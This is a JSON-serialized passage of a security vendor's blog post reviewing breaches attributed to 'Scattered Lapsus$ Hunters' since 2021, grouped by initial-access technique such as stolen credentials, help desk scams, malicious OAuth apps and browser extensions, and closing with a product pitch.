AITM phishing kits","2026-03-26T00:00:00.000Z",{"items":962},[963,1938,2961],{"__typename":964,"sys":965,"content":967,"title":1920,"synopsis":1921,"hashTags":62,"publishedDate":1922,"slug":1923,"tagsCollection":1924,"authorsCollection":1934},"BlogPosts",{"id":966},"2sFCww9xnI8okIxhtOaiY1",{"json":968},{"nodeType":239,"data":969,"content":970},{},[971,978,985,992,995,1003,1010,1017,1023,1030,1036,1056,1063,1075,1078,1086,1093,1109,1116,1128,1134,1137,1145,1153,1159,1168,1188,1197,1204,1213,1232,1241,1248,1257,1290,1299,1306,1315,1333,1339,1348,1355,1364,1406,1409,1417,1426,1446,1455,1462,1471,1504,1510,1519,1526,1532,1535,1543,1552,1559,1619,1625,1628,1636,1645,1652,1658,1661,1669,1676,1683,1753,1760,1823,1830,1833,1841,1848,1855,1861,1864,1872,1879,1886,1893],{"nodeType":243,"data":972,"content":973},{},[974],{"nodeType":247,"value":975,"marks":976,"data":977},"The biggest cybersecurity story this year (so far) has been the emergence of “Scattered Lapsus$ Hunters” and their record-breaking worldwide hacking spree. ",[],{},{"nodeType":243,"data":979,"content":980},{},[981],{"nodeType":247,"value":982,"marks":983,"data":984},"Scattered Lapsus$ Hunters is part of “The Com”, the name for the broad community of English-speaking cybercriminals with international criminal connections — including with nation-state sponsored groups. They are also known to collaborate with a range of cybercrime “as-a-Service” organizations for phishing, initial access, ransomware, and more. ",[],{},{"nodeType":243,"data":986,"content":987},{},[988],{"nodeType":247,"value":989,"marks":990,"data":991},"It’s difficult to pin down exactly who the individuals are that make up this criminal collective. But what is known is their MO — making money through extortion by means of account takeover, mass data theft, and ransomware deployment. ",[],{},{"nodeType":283,"data":993,"content":994},{},[],{"nodeType":287,"data":996,"content":997},{},[998],{"nodeType":247,"value":999,"marks":1000,"data":1002},"How did we get here? ",[1001],{"type":294},{},{"nodeType":243,"data":1004,"content":1005},{},[1006],{"nodeType":247,"value":1007,"marks":1008,"data":1009},"Earlier this year, the threat group known to most analysts as Scattered Spider (also tracked as 0ktapus, Octo Tempest, Scatter Swine, Muddled Libra, and UNC3944) re-emerged after a series of arrests in late 2024. ",[],{},{"nodeType":243,"data":1011,"content":1012},{},[1013],{"nodeType":247,"value":1014,"marks":1015,"data":1016},"This group has been active in peaks and troughs over the years, but are mainly known for high-profile ransomware attacks on Caesars and MGM Resorts in 2024. ",[],{},{"nodeType":274,"data":1018,"content":1022},{"target":1019},{"sys":1020},{"id":1021,"type":279,"linkType":280},"1Vt269d7n6IGMzOrJs1FDx",[],{"nodeType":243,"data":1024,"content":1025},{},[1026],{"nodeType":247,"value":1027,"marks":1028,"data":1029},"Scattered Spider hit the headlines again in April 2025 with attacks on UK retailers Marks & Spencer and Co-op, which resulted in significant, prolonged disruption, and a serious downstream impact on the retail supply chain. ",[],{},{"nodeType":274,"data":1031,"content":1035},{"target":1032},{"sys":1033},{"id":1034,"type":279,"linkType":280},"3kvcGV2zZZUPnM8IK04Y1O",[],{"nodeType":243,"data":1037,"content":1038},{},[1039,1043,1052],{"nodeType":247,"value":1040,"marks":1041,"data":1042},"It didn’t stop there, though. What followed was a wide-scale campaign targeting Salesforce customers, with the attackers claiming to have stolen ",[],{},{"nodeType":259,"data":1044,"content":1046},{"uri":1045},"https://www.bleepingcomputer.com/news/security/shinyhunters-claims-15-billion-salesforce-records-stolen-in-drift-hacks/",[1047],{"nodeType":247,"value":1048,"marks":1049,"data":1051},"over 1.5 billion records from 1000+ companies",[1050],{"type":267},{},{"nodeType":247,"value":1053,"marks":1054,"data":1055}," across multiple verticals, including heavyweights like Google, Cloudflare, Workday, Adidas, FedEx, Disney, LVMH, and many more.",[],{},{"nodeType":243,"data":1057,"content":1058},{},[1059],{"nodeType":247,"value":1060,"marks":1061,"data":1062},"Around this time, the attackers began to refer to themselves as part of a wider collective, assuming the moniker “Scattered Lapsus$ Hunters” (a mash-up of names given by analysts and self-adopted by attackers — Scattered Spider, ShinyHunters, and Lapsus$).",[],{},{"nodeType":243,"data":1064,"content":1065},{},[1066,1070],{"nodeType":247,"value":1067,"marks":1068,"data":1069},"The most significant breach this year to-date impacted Jaguar Land Rover. A ransomware attack resulted in months of disruption that directly impacted the UK’s GDP, with the government underwriting a $1.5B loan to alleviate the supply chain impact. ",[],{},{"nodeType":247,"value":1071,"marks":1072,"data":1074},"In fact, this was the most economically consequential cyber attack yet recorded in a G7 economy. ",[1073],{"type":294},{},{"nodeType":283,"data":1076,"content":1077},{},[],{"nodeType":287,"data":1079,"content":1080},{},[1081],{"nodeType":247,"value":1082,"marks":1083,"data":1085},"2025 wasn’t a one-off",[1084],{"type":294},{},{"nodeType":243,"data":1087,"content":1088},{},[1089],{"nodeType":247,"value":1090,"marks":1091,"data":1092},"The developments through 2025 have presented a stronger picture than ever before that cybercriminal operations are heavily interlinked. Groups overlap considerably, and individuals freely move between different cells. ",[],{},{"nodeType":243,"data":1094,"content":1095},{},[1096,1100,1105],{"nodeType":247,"value":1097,"marks":1098,"data":1099},"When we scratch beneath the surface, this is evident in the tactics, techniques and procedures (TTPs) used by these attackers — even stretching as far back as 2021 with the initial rise of Lapsus$. This is not an accident. ",[],{},{"nodeType":247,"value":1101,"marks":1102,"data":1104},"The TTPs used show a conscious move by attackers to move away from environments that are well-protected by traditional security tools. ",[1103],{"type":294},{},{"nodeType":247,"value":1106,"marks":1107,"data":1108},"This means avoiding targeting endpoints with malware, and not relying on software-based exploits. Instead, these attackers look to take over apps and services directly over the internet. ",[],{},{"nodeType":243,"data":1110,"content":1111},{},[1112],{"nodeType":247,"value":1113,"marks":1114,"data":1115},"Most of the time, this is as simple as logging in to a SaaS app, or an enterprise SSO account (e.g. Microsoft, Okta, or Google) and dumping the data. For attackers that want to take it further, they can abuse the sprawl of interconnected apps that make up modern business IT, seeking out specific data or exploitable functionality. Or, they can leverage internet-accessible management portals to chart a path back to your on-premise assets, giving them everything they need to pivot toward more conventional methods such as ransomware deployment. ",[],{},{"nodeType":243,"data":1117,"content":1118},{},[1119,1123],{"nodeType":247,"value":1120,"marks":1121,"data":1122},"When we look at historical breaches, the pattern is clear. ",[],{},{"nodeType":247,"value":1124,"marks":1125,"data":1127},"Not one of the attacks attributed to Scattered Lapsus$ Hunters, or its predecessors, started with an endpoint or network attack — they all began with account takeover. ",[1126],{"type":294},{},{"nodeType":274,"data":1129,"content":1133},{"target":1130},{"sys":1131},{"id":1132,"type":279,"linkType":280},"6poP5VM2ARrEvwKEG42HgK",[],{"nodeType":283,"data":1135,"content":1136},{},[],{"nodeType":287,"data":1138,"content":1139},{},[1140],{"nodeType":247,"value":1141,"marks":1142,"data":1144},"TTP breakdown: Analyzing the top “Scattered Lapsus$ Hunters” breaches since 2021",[1143],{"type":294},{},{"nodeType":382,"data":1146,"content":1147},{},[1148],{"nodeType":247,"value":1149,"marks":1150,"data":1152},"Phishing and stolen credentials",[1151],{"type":294},{},{"nodeType":274,"data":1154,"content":1158},{"target":1155},{"sys":1156},{"id":1157,"type":279,"linkType":280},"4SNOanDIdGZsvRRnMYQVSo",[],{"nodeType":243,"data":1160,"content":1161},{},[1162],{"nodeType":247,"value":1163,"marks":1164,"data":1167},"EA Games (2021)",[1165,1166],{"type":294},{"type":267},{},{"nodeType":243,"data":1169,"content":1170},{},[1171,1175,1184],{"nodeType":247,"value":1172,"marks":1173,"data":1174},"Attackers used stolen session cookies to log into EA’s Slack instance, purchased on a criminal forum. Combined with ",[],{},{"nodeType":259,"data":1176,"content":1178},{"uri":1177},"https://pushsecurity.com/blog/phishing-slack-persistence/",[1179],{"nodeType":247,"value":1180,"marks":1181,"data":1183},"social engineering via Slack",[1182],{"type":267},{},{"nodeType":247,"value":1185,"marks":1186,"data":1187},", this was used to steal 750GB of data, including video game source code. ",[],{},{"nodeType":243,"data":1189,"content":1190},{},[1191],{"nodeType":247,"value":1192,"marks":1193,"data":1196},"Nvidia (2022)",[1194,1195],{"type":294},{"type":267},{},{"nodeType":243,"data":1198,"content":1199},{},[1200],{"nodeType":247,"value":1201,"marks":1202,"data":1203},"Attackers used stolen credentials to steal 1TB of data from Nvidia’s internal shares, including a significant amount of sensitive information about the designs of Nvidia graphics cards, source code, and the usernames and passwords of more than 71,000 Nvidia employees.",[],{},{"nodeType":243,"data":1205,"content":1206},{},[1207],{"nodeType":247,"value":1208,"marks":1209,"data":1212},"Microsoft (2022)",[1210,1211],{"type":294},{"type":267},{},{"nodeType":243,"data":1214,"content":1215},{},[1216,1220,1228],{"nodeType":247,"value":1217,"marks":1218,"data":1219},"Attackers used stolen credentials combined with SIM swapping and ",[],{},{"nodeType":259,"data":1221,"content":1223},{"uri":1222},"https://github.com/pushsecurity/saas-attacks/blob/main/techniques/mfa_fatigue/description.md",[1224],{"nodeType":247,"value":1225,"marks":1226,"data":1227},"MFA fatigue",[],{},{"nodeType":247,"value":1229,"marks":1230,"data":1231}," attacks to steal Azure DevOps source code — leaked a 9GB archive of Microsoft source code – including ~90% of Bing and 45% of Cortana code. ",[],{},{"nodeType":243,"data":1233,"content":1234},{},[1235],{"nodeType":247,"value":1236,"marks":1237,"data":1240},"T-Mobile (2022)",[1238,1239],{"type":294},{"type":267},{},{"nodeType":243,"data":1242,"content":1243},{},[1244],{"nodeType":247,"value":1245,"marks":1246,"data":1247},"Attackers used stolen credentials to establish initial access, coupled with social engineering T-Mobile staff into approving the attacker’s device for VPN access. This resulted in source code being stolen from over 30,000 repositories. ",[],{},{"nodeType":243,"data":1249,"content":1250},{},[1251],{"nodeType":247,"value":1252,"marks":1253,"data":1256},"Snowflake (165 customers) (2024)",[1254,1255],{"type":294},{"type":267},{},{"nodeType":243,"data":1258,"content":1259},{},[1260,1264,1273,1277,1286],{"nodeType":247,"value":1261,"marks":1262,"data":1263},"Attackers targeted ",[],{},{"nodeType":259,"data":1265,"content":1267},{"uri":1266},"https://pushsecurity.com/blog/snowflake-retro/",[1268],{"nodeType":247,"value":1269,"marks":1270,"data":1272},"165 Snowflake customers",[1271],{"type":267},{},{"nodeType":247,"value":1274,"marks":1275,"data":1276}," using stolen credentials from credential breaches dating back as far as 2020. Due to widespread MFA gaps and the presence of ",[],{},{"nodeType":259,"data":1278,"content":1280},{"uri":1279},"https://github.com/pushsecurity/saas-attacks/blob/main/techniques/ghost_logins/description.md",[1281],{"nodeType":247,"value":1282,"marks":1283,"data":1285},"ghost logins",[1284],{"type":267},{},{"nodeType":247,"value":1287,"marks":1288,"data":1289},", attackers were able to simply log in to individual customer tenants, dump the data, and use it to extort the companies. In total, 9 public victims were named following the breach, with over 1B breached customer records. ",[],{},{"nodeType":243,"data":1291,"content":1292},{},[1293],{"nodeType":247,"value":1294,"marks":1295,"data":1298},"PowerSchool (2024)",[1296,1297],{"type":294},{"type":267},{},{"nodeType":243,"data":1300,"content":1301},{},[1302],{"nodeType":247,"value":1303,"marks":1304,"data":1305},"Attackers gained access to a community-focused customer support portal, PowerSource, using compromised credentials and stole data using an \"export data manager\" customer support tool, stealing the data of 62.4 million students and 9.5 million teachers. PowerSchool paid an undisclosed ransom fee, but hackers returned later to extort schools and individuals separately anyway.",[],{},{"nodeType":243,"data":1307,"content":1308},{},[1309],{"nodeType":247,"value":1310,"marks":1311,"data":1314},"Red Hat (2025)",[1312,1313],{"type":294},{"type":267},{},{"nodeType":243,"data":1316,"content":1317},{},[1318,1322,1329],{"nodeType":247,"value":1319,"marks":1320,"data":1321},"Attackers breached Red Hat’s GitLab instance via a compromised account — the result of ",[],{},{"nodeType":259,"data":1323,"content":1324},{"uri":1279},[1325],{"nodeType":247,"value":1282,"marks":1326,"data":1328},[1327],{"type":267},{},{"nodeType":247,"value":1330,"marks":1331,"data":1332}," providing a backdoor to access an otherwise secure, SSO-connected account. Stolen data included approximately 800 Customer Engagement Reports (CERs), authentication tokens, full database URIs, and other private information in Red Hat code and CERs, which they claimed to use to gain access to downstream customer infrastructure. ",[],{},{"nodeType":274,"data":1334,"content":1338},{"target":1335},{"sys":1336},{"id":1337,"type":279,"linkType":280},"G1V7d5Dvevmr9p0YXElPX",[],{"nodeType":243,"data":1340,"content":1341},{},[1342],{"nodeType":247,"value":1343,"marks":1344,"data":1347},"Discord (2025)",[1345,1346],{"type":294},{"type":267},{},{"nodeType":243,"data":1349,"content":1350},{},[1351],{"nodeType":247,"value":1352,"marks":1353,"data":1354},"Attackers compromised a Zendesk customer support account, stealing 1.6TB of data. The hackers say this consisted of roughly 8.4 million tickets affecting 5.5 million unique users, and that about 580,000 users contained payment information.",[],{},{"nodeType":243,"data":1356,"content":1357},{},[1358],{"nodeType":247,"value":1359,"marks":1360,"data":1363},"SoundCloud, MatchGroup, Crunchbase, Betterment... (2026)",[1361,1362],{"type":294},{"type":267},{},{"nodeType":243,"data":1365,"content":1366},{},[1367,1371,1379,1383,1391,1395,1402],{"nodeType":247,"value":1368,"marks":1369,"data":1370},"Scattered Lapsus$ Hunters have already claimed several public victims in 2026, with over 60 million breached records. ",[],{},{"nodeType":259,"data":1372,"content":1374},{"uri":1373},"https://www.bleepingcomputer.com/news/security/shinyhunters-claim-to-be-behind-sso-account-data-theft-attacks/",[1375],{"nodeType":247,"value":1376,"marks":1377,"data":1378},"SoundCloud, Betterment, Crunchbase",[],{},{"nodeType":247,"value":1380,"marks":1381,"data":1382}," and ",[],{},{"nodeType":259,"data":1384,"content":1386},{"uri":1385},"https://www.bleepingcomputer.com/news/security/match-group-breach-exposes-data-from-hinge-tinder-okcupid-and-match/",[1387],{"nodeType":247,"value":1388,"marks":1389,"data":1390},"MatchGroup",[],{},{"nodeType":247,"value":1392,"marks":1393,"data":1394}," have all reported breaches this month, powered by a brand ",[],{},{"nodeType":259,"data":1396,"content":1397},{"uri":559},[1398],{"nodeType":247,"value":1399,"marks":1400,"data":1401},"new real-time-operated AiTM phishing kit",[],{},{"nodeType":247,"value":1403,"marks":1404,"data":1405}," targeting Okta, Entra, and Google SSO accounts. This is a developing situation, with more victims expected to be announced publicly soon.",[],{},{"nodeType":283,"data":1407,"content":1408},{},[],{"nodeType":382,"data":1410,"content":1411},{},[1412],{"nodeType":247,"value":1413,"marks":1414,"data":1416},"Vishing and help desk scams",[1415],{"type":294},{},{"nodeType":243,"data":1418,"content":1419},{},[1420],{"nodeType":247,"value":1421,"marks":1422,"data":1425},"MGM Resorts & Caesars (2023)",[1423,1424],{"type":294},{"type":267},{},{"nodeType":243,"data":1427,"content":1428},{},[1429,1433,1442],{"nodeType":247,"value":1430,"marks":1431,"data":1432},"MGM Resorts and Caesars were hit with twin breaches in 2023. Attackers socially engineered help desk personnel to take over accounts with Super Administrator privileges within MGM Resorts’ Okta tenant, which they then used to register a second, attacker-controlled IdP via ",[],{},{"nodeType":259,"data":1434,"content":1436},{"uri":1435},"https://github.com/pushsecurity/saas-attacks/blob/main/techniques/inbound_federation/description.md",[1437],{"nodeType":247,"value":1438,"marks":1439,"data":1441},"inbound federation",[1440],{"type":267},{},{"nodeType":247,"value":1443,"marks":1444,"data":1445}," — granting comprehensive access that was used to deploy ransomware. ",[],{},{"nodeType":243,"data":1447,"content":1448},{},[1449],{"nodeType":247,"value":1450,"marks":1451,"data":1454},"Transport for London (2024)",[1452,1453],{"type":294},{"type":267},{},{"nodeType":243,"data":1456,"content":1457},{},[1458],{"nodeType":247,"value":1459,"marks":1460,"data":1461},"Attackers socially engineered the Transport for London help desk to gain privileged access to the IT environment, resulting in prolonged disruption to key online services underpinning London’s public transport network, theft of 5,000 users bank details, and all 30,000 staff members having to reset their online credentials in person.",[],{},{"nodeType":243,"data":1463,"content":1464},{},[1465],{"nodeType":247,"value":1466,"marks":1467,"data":1470},"Marks & Spencer (2025)",[1468,1469],{"type":294},{"type":267},{},{"nodeType":243,"data":1472,"content":1473},{},[1474,1478,1487,1491,1500],{"nodeType":247,"value":1475,"marks":1476,"data":1477},"Attackers compromised a Microsoft Entra account belonging to a privileged user via a ",[],{},{"nodeType":259,"data":1479,"content":1481},{"uri":1480},"https://pushsecurity.com/blog/scattered-spider-defending-against-help-desk-scams/",[1482],{"nodeType":247,"value":1483,"marks":1484,"data":1486},"help desk scam",[1485],{"type":267},{},{"nodeType":247,"value":1488,"marks":1489,"data":1490},", which enabled them to steal sensitive data from cloud environments, as well as pivot to deploy ransomware via the ",[],{},{"nodeType":259,"data":1492,"content":1494},{"uri":1493},"https://cloud.google.com/blog/topics/threat-intelligence/vsphere-active-directory-integration-risks",[1495],{"nodeType":247,"value":1496,"marks":1497,"data":1499},"VMware admin console",[1498],{"type":267},{},{"nodeType":247,"value":1501,"marks":1502,"data":1503},". This enabled ransomware to be deployed at the hypervisor layer, evading host-based protections like EDR. ",[],{},{"nodeType":274,"data":1505,"content":1509},{"target":1506},{"sys":1507},{"id":1508,"type":279,"linkType":280},"7hBdHG74NaA3bQfOMpYA9o",[],{"nodeType":243,"data":1511,"content":1512},{},[1513],{"nodeType":247,"value":1514,"marks":1515,"data":1518},"Jaguar Land Rover (2025)",[1516,1517],{"type":294},{"type":267},{},{"nodeType":243,"data":1520,"content":1521},{},[1522],{"nodeType":247,"value":1523,"marks":1524,"data":1525},"Attackers compromised highly privileged admin accounts via a help desk scam, which they leveraged to access and deploy ransomware to all aspects of Jaguar’s business, from CAD and engineering software, to payments tracking, to customer car delivery, using similar techniques to the Marks & Spencer breach. ",[],{},{"nodeType":274,"data":1527,"content":1531},{"target":1528},{"sys":1529},{"id":1530,"type":279,"linkType":280},"6s1X2fo4K9EeVLBmHm4YXb",[],{"nodeType":283,"data":1533,"content":1534},{},[],{"nodeType":382,"data":1536,"content":1537},{},[1538],{"nodeType":247,"value":1539,"marks":1540,"data":1542},"Malicious OAuth integrations",[1541],{"type":294},{},{"nodeType":243,"data":1544,"content":1545},{},[1546],{"nodeType":247,"value":1547,"marks":1548,"data":1551},"Salesforce & Salesloft (1000+ customers) (2025)",[1549,1550],{"type":294},{"type":267},{},{"nodeType":243,"data":1553,"content":1554},{},[1555],{"nodeType":247,"value":1556,"marks":1557,"data":1558},"A vast campaign against Salesforce customers resulted in the compromise of 1000+ Salesforce tenants (according to the attacker) with more than 1.5 billion records stolen. This campaign can consisted of three phases:",[],{},{"nodeType":318,"data":1560,"content":1561},{},[1562,1577,1592],{"nodeType":322,"data":1563,"content":1564},{},[1565],{"nodeType":243,"data":1566,"content":1567},{},[1568,1573],{"nodeType":247,"value":1569,"marks":1570,"data":1572},"Phase 1:",[1571],{"type":294},{},{"nodeType":247,"value":1574,"marks":1575,"data":1576}," The attacker conducted a large-scale vishing campaign against Salesforce customers, calling up users and socially engineering them into connecting a malicious version of the “Data Loader” app into their tenant. This was in fact an attacker-controlled app that enabled data to be mass-exfiltrated via API. ",[],{},{"nodeType":322,"data":1578,"content":1579},{},[1580],{"nodeType":243,"data":1581,"content":1582},{},[1583,1588],{"nodeType":247,"value":1584,"marks":1585,"data":1587},"Phase 2: ",[1586],{"type":294},{},{"nodeType":247,"value":1589,"marks":1590,"data":1591},"The attacker conducted a supply-chain compromise against customers of Salesloft. Users of Salesloft’s “Drift” integration were impacted by attackers stealing access tokens from Salesloft’s AWS environment. This integration allowed the attacker to steal data from customers that had deployed Drift to connected environments — namely, Salesforce, and Google Workspace. ",[],{},{"nodeType":322,"data":1593,"content":1594},{},[1595],{"nodeType":243,"data":1596,"content":1597},{},[1598,1603,1607,1615],{"nodeType":247,"value":1599,"marks":1600,"data":1602},"Phase 3:",[1601],{"type":294},{},{"nodeType":247,"value":1604,"marks":1605,"data":1606}," The attacker then conducted a separate supply-chain compromise involving Gainsight (allegedly using OAuth tokens stolen in the Salesloft attack) which enabled them to ",[],{},{"nodeType":259,"data":1608,"content":1610},{"uri":1609},"https://www.bleepingcomputer.com/news/security/salesforce-investigates-customer-data-theft-via-gainsight-breach/",[1611],{"nodeType":247,"value":1612,"marks":1613,"data":1614},"breach a further 285 Salesforce instances",[],{},{"nodeType":247,"value":1616,"marks":1617,"data":1618}," using stolen OAuth tokens from Gainsight's integrations. ",[],{},{"nodeType":274,"data":1620,"content":1624},{"target":1621},{"sys":1622},{"id":1623,"type":279,"linkType":280},"3TwjpVKQ42SwQRhvGFbZdn",[],{"nodeType":283,"data":1626,"content":1627},{},[],{"nodeType":382,"data":1629,"content":1630},{},[1631],{"nodeType":247,"value":1632,"marks":1633,"data":1635},"Malicious browser extensions",[1634],{"type":294},{},{"nodeType":243,"data":1637,"content":1638},{},[1639],{"nodeType":247,"value":1640,"marks":1641,"data":1644},"CyberHaven (2024)",[1642,1643],{"type":294},{"type":267},{},{"nodeType":243,"data":1646,"content":1647},{},[1648],{"nodeType":247,"value":1649,"marks":1650,"data":1651},"Hackers phished a CyberHaven extension developer and uploaded a malicious version of the CyberHaven extension to the Chrome Web Store, leading to customer data breaches where installed in user browsers, impacting CyberHaven’s estimated ~400 business customers. This was part of a broader campaign that targeted 35 Chrome extensions, collectively impacting over 2.5 million users.",[],{},{"nodeType":274,"data":1653,"content":1657},{"target":1654},{"sys":1655},{"id":1656,"type":279,"linkType":280},"4ErDI0xi0Vj2Zrk8Qsb2NB",[],{"nodeType":283,"data":1659,"content":1660},{},[],{"nodeType":287,"data":1662,"content":1663},{},[1664],{"nodeType":247,"value":1665,"marks":1666,"data":1668},"The bigger picture",[1667],{"type":294},{},{"nodeType":243,"data":1670,"content":1671},{},[1672],{"nodeType":247,"value":1673,"marks":1674,"data":1675},"Scattered Lapsus$ Hunters are dominating the headlines right now, but they aren’t the only attackers using these modern techniques and consciously evading established security controls. ",[],{},{"nodeType":243,"data":1677,"content":1678},{},[1679],{"nodeType":247,"value":1680,"marks":1681,"data":1682},"Threat reports agree that attackers are steering away from traditional exploit and malware-driven breaches towards identities:",[],{},{"nodeType":318,"data":1684,"content":1685},{},[1686,1709,1731],{"nodeType":322,"data":1687,"content":1688},{},[1689],{"nodeType":243,"data":1690,"content":1691},{},[1692,1696,1705],{"nodeType":247,"value":1693,"marks":1694,"data":1695},"Identity-based attacks surged 32% in the last year, while 97% of identity attacks are password-based, driven by credential leaks and infostealer malware. (",[],{},{"nodeType":259,"data":1697,"content":1699},{"uri":1698},"https://cdn-dynmedia-1.microsoft.com/is/content/microsoftcorp/microsoft/msc/documents/presentations/CSR/Microsoft-Digital-Defense-Report-2025.pdf#page=1",[1700],{"nodeType":247,"value":1701,"marks":1702,"data":1704},"Microsoft",[1703],{"type":267},{},{"nodeType":247,"value":1706,"marks":1707,"data":1708},")",[],{},{"nodeType":322,"data":1710,"content":1711},{},[1712],{"nodeType":243,"data":1713,"content":1714},{},[1715,1719,1728],{"nodeType":247,"value":1716,"marks":1717,"data":1718},"79% of detections were malware-free in the last year, up from 40% in 2019. (",[],{},{"nodeType":259,"data":1720,"content":1722},{"uri":1721},"https://www.crowdstrike.com/en-gb/global-threat-report/",[1723],{"nodeType":247,"value":1724,"marks":1725,"data":1727},"CrowdStrike",[1726],{"type":267},{},{"nodeType":247,"value":1706,"marks":1729,"data":1730},[],{},{"nodeType":322,"data":1732,"content":1733},{},[1734],{"nodeType":243,"data":1735,"content":1736},{},[1737,1741,1750],{"nodeType":247,"value":1738,"marks":1739,"data":1740},"Credential abuse and phishing combined accounted for 38% of breaches, making identity the primary breach vector observed. (",[],{},{"nodeType":259,"data":1742,"content":1744},{"uri":1743},"https://www.verizon.com/business/resources/reports/dbir/",[1745],{"nodeType":247,"value":1746,"marks":1747,"data":1749},"Verizon",[1748],{"type":267},{},{"nodeType":247,"value":1706,"marks":1751,"data":1752},[],{},{"nodeType":243,"data":1754,"content":1755},{},[1756],{"nodeType":247,"value":1757,"marks":1758,"data":1759},"And other public breaches from this year alone demonstrate similar TTPs from outside of the Scattered Lapsus$ Hunters orbit:",[],{},{"nodeType":318,"data":1761,"content":1762},{},[1763,1778,1793,1808],{"nodeType":322,"data":1764,"content":1765},{},[1766],{"nodeType":243,"data":1767,"content":1768},{},[1769,1774],{"nodeType":247,"value":1770,"marks":1771,"data":1773},"Nikkei",[1772],{"type":294},{},{"nodeType":247,"value":1775,"marks":1776,"data":1777},": Japanese publishing giant Nikkei’s Slack messaging platform was compromised using stolen credentials, leaking the names, email addresses, and chat histories for 17,368 individuals registered on Slack.",[],{},{"nodeType":322,"data":1779,"content":1780},{},[1781],{"nodeType":243,"data":1782,"content":1783},{},[1784,1789],{"nodeType":247,"value":1785,"marks":1786,"data":1788},"Evertec",[1787],{"type":294},{},{"nodeType":247,"value":1790,"marks":1791,"data":1792},": Hackers tried to steal $130 million from Evertec’s Brazilian subsidiary Sinqia S.A.after gaining unauthorized access to its environment on the central bank’s real-time payment system (Pix) using stolen credentials.",[],{},{"nodeType":322,"data":1794,"content":1795},{},[1796],{"nodeType":243,"data":1797,"content":1798},{},[1799,1804],{"nodeType":247,"value":1800,"marks":1801,"data":1803},"Hy-Vee:",[1802],{"type":294},{},{"nodeType":247,"value":1805,"marks":1806,"data":1807}," Was hit with a data breach after hackers logged in with stolen credentials, exposing 53GB of sensitive data.",[],{},{"nodeType":322,"data":1809,"content":1810},{},[1811],{"nodeType":243,"data":1812,"content":1813},{},[1814,1819],{"nodeType":247,"value":1815,"marks":1816,"data":1818},"Scania: ",[1817],{"type":294},{},{"nodeType":247,"value":1820,"marks":1821,"data":1822},"Automotive giant Scania confirmed it suffered a cybersecurity incident where threat actors used compromised credentials to breach its Financial Services systems and steal insurance claim documents.",[],{},{"nodeType":243,"data":1824,"content":1825},{},[1826],{"nodeType":247,"value":1827,"marks":1828,"data":1829},"Scattered Lapsus$ Hunters may be grabbing the headlines — but this a huge movement in a vast and flexible community of attackers. And criminals around the world are learning from their success. ",[],{},{"nodeType":283,"data":1831,"content":1832},{},[],{"nodeType":287,"data":1834,"content":1835},{},[1836],{"nodeType":247,"value":1837,"marks":1838,"data":1840},"Lessons learned",[1839],{"type":294},{},{"nodeType":243,"data":1842,"content":1843},{},[1844],{"nodeType":247,"value":1845,"marks":1846,"data":1847},"The common thread with all of these attacks is that they are evading established security controls by targeting applications directly, over the internet, via account takeover.",[],{},{"nodeType":243,"data":1849,"content":1850},{},[1851],{"nodeType":247,"value":1852,"marks":1853,"data":1854},"Clearly, the success of these attacks shows the limitations of multiple control layers. Endpoint and network layer controls have no visibility of this attack surface. Identity-focused controls are being undermined by ghost logins and shadow IT. And the limitations of cloud security controls in their ability to encompass all apps, and detect and stop malicious actions in real-time (that often blend in seamlessly with normal user activity). ",[],{},{"nodeType":274,"data":1856,"content":1860},{"target":1857},{"sys":1858},{"id":1859,"type":279,"linkType":280},"4Dg3fZEGf7ShyQJ8jlNDME",[],{"nodeType":283,"data":1862,"content":1863},{},[],{"nodeType":287,"data":1865,"content":1866},{},[1867],{"nodeType":247,"value":1868,"marks":1869,"data":1871},"How Push can help",[1870],{"type":294},{},{"nodeType":243,"data":1873,"content":1874},{},[1875],{"nodeType":247,"value":1876,"marks":1877,"data":1878},"Stopping attacks that are designed to evade established controls is in our DNA — it’s the reason Push was founded. ",[],{},{"nodeType":243,"data":1880,"content":1881},{},[1882],{"nodeType":247,"value":1883,"marks":1884,"data":1885},"The browser is the gateway to to the apps and identities that attackers are now targeting, with many attacks taking place inside the user’s browser — whether that’s entering credentials onto a phishing page, approving a malicious OAuth grant, installing a risky browser extension, or insecurely accessing an app with a weak password and no MFA. ",[],{},{"nodeType":243,"data":1887,"content":1888},{},[1889],{"nodeType":247,"value":1890,"marks":1891,"data":1892},"Push’s browser-based security platform provides comprehensive detection and response capabilities against attacks like AiTM phishing, credential stuffing, malicious browser extensions, malicious OAuth grants, ClickFix, and session hijacking. You don’t need to wait until it all goes wrong either — you can use Push to proactively find and fix vulnerabilities across the apps that your employees use, like ghost logins, SSO coverage gaps, MFA gaps, vulnerable passwords, and more to harden your attack surface.",[],{},{"nodeType":243,"data":1894,"content":1895},{},[1896,1899,1906,1910,1917],{"nodeType":247,"value":796,"marks":1897,"data":1898},[],{},{"nodeType":259,"data":1900,"content":1901},{"uri":801},[1902],{"nodeType":247,"value":804,"marks":1903,"data":1905},[1904],{"type":267},{},{"nodeType":247,"value":1907,"marks":1908,"data":1909}," or ",[],{},{"nodeType":259,"data":1911,"content":1912},{"uri":827},[1913],{"nodeType":247,"value":830,"marks":1914,"data":1916},[1915],{"type":267},{},{"nodeType":247,"value":580,"marks":1918,"data":1919},[],{},"\"Scattered Lapsus$ Hunters\" — how modern attackers exploit the gaps in your security stack ","How Scattered Lapsus$ Hunters breaches demonstrate the evolution of attacker TTPs, shaping the future of cyber attacks.","2025-11-13T00:00:00.000Z","scattered-lapsus-hunters",{"items":1925},[1926,1930],{"sys":1927,"name":1929},{"id":1928},"6A5RXS31ZQx3PwryGb1IMy","Browser-based attacks",{"sys":1931,"name":1933},{"id":1932},"4ksQNCFeBf8H4QIORqpRLw","Detection & 